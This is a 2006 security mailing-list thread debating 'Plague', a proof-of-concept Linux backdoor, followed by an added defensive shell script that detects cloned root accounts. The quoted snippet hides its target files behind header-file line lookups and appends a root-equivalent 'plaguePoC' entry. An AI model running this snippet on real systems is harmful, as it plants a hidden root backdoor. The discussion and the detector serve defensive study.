On Sun, 22 Oct 2006 06:29:35 -0500 [EMAIL PROTECTED] wrote:
>even if they have ssh access, there is still nothing they can do, except
>to create two files in there $HOME directories containing expressions from
>paths.h and sysexits.h ?
>
>Why would that be considered a backdoor?
>
>Regards,
>-Nikolay Kichukov
>
>
>> On 10/22/06, J. Oquendo <[EMAIL PROTECTED]> wrote:
>>>
>>> Plague is an odd proof of concept backdoor keeping
>>> tool based on the premise of using existing system
>>> files and commands to keep and maintain a backdoor
>>> on Linux systems. I could have modified this for
>>> BSD, Solaris, etc., but I didn't feel like doing
>>> the work...
>>>
>>> http://www.infiltrated.net/plague
>>>
>>
>> (from the link)
>>
>> if [ -e /usr/include/paths.h ]
>>
>> then
>>
>> file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
>> sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
>> file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
>> sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2
>>
>> fi
>>
>> --------------------------------
>>
>> So this backdoor wouldn't work remotely, correct? You would need to add
>> the user to the people allowed to ssh in, and poke a hole for ssh in
>> the firewall./?
>>
>> -JP
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/

You said "there" when it should be "their."
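A defensive check for what the quoted snippet leaves behind, as an added example that is not part of the original thread or of the Plague tool: the snippet re-appends line 1 of each target file with `root` replaced by `plaguePoC`. Assuming those targets are the passwd and shadow databases (the thread does not name them), the result is a second UID 0 account that shares root's password hash; the function names and sample data below are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): flag cloned root entries in
# passwd- and shadow-format files. Assumption: these are the files the
# quoted snippet appends to; the thread itself does not name them.

# Print every account other than root whose UID field is 0.
uid0_clones() {
    awk -F: '$1 !~ /^#/ && $3 ~ /^0+$/ && $1 != "root" { print $1 }' "$1"
}

# Print every account that shares root's password hash. The file is read
# twice: pass 1 records root's hash, pass 2 compares. Locked or empty
# hashes ("!", "*", "") are ignored because many accounts share them.
hash_clones() {
    awk -F: 'NR == FNR { if ($1 == "root") h = $2; next }
             h != "" && h !~ /^[!*]/ && $1 != "root" && $2 == h { print $1 }' "$1" "$1"
}

# Report findings for a passwd/shadow pair; return 1 if anything is found.
audit() {
    found=0
    for u in $(uid0_clones "$1"); do
        echo "ALERT: $u has UID 0 in $1"; found=1
    done
    for u in $(hash_clones "$2"); do
        echo "ALERT: $u shares root's password hash in $2"; found=1
    done
    return "$found"
}

# Constructed sample data: a clean pair, and a pair with the first line
# re-appended after s/root/plaguePoC/g, as in the quoted snippet.
demo=$(mktemp -d)
printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
              'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' > "$demo/passwd"
printf '%s\n' 'root:$6$CONSTRUCTED$hash:13443:0:99999:7:::' \
              'daemon:*:13443:0:99999:7:::' > "$demo/shadow"
cp "$demo/passwd" "$demo/passwd.bad"; cp "$demo/shadow" "$demo/shadow.bad"
echo 'plaguePoC:x:0:0:plaguePoC:/plaguePoC:/bin/bash' >> "$demo/passwd.bad"
echo 'plaguePoC:$6$CONSTRUCTED$hash:13443:0:99999:7:::' >> "$demo/shadow.bad"

audit "$demo/passwd" "$demo/shadow" && echo "clean pair: no findings"
audit "$demo/passwd.bad" "$demo/shadow.bad" || echo "modified pair: findings above"
```

On a live host, `audit /etc/passwd /etc/shadow` needs read access to the shadow file, and any legitimate secondary UID 0 account will also be reported and should be allow-listed deliberately.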
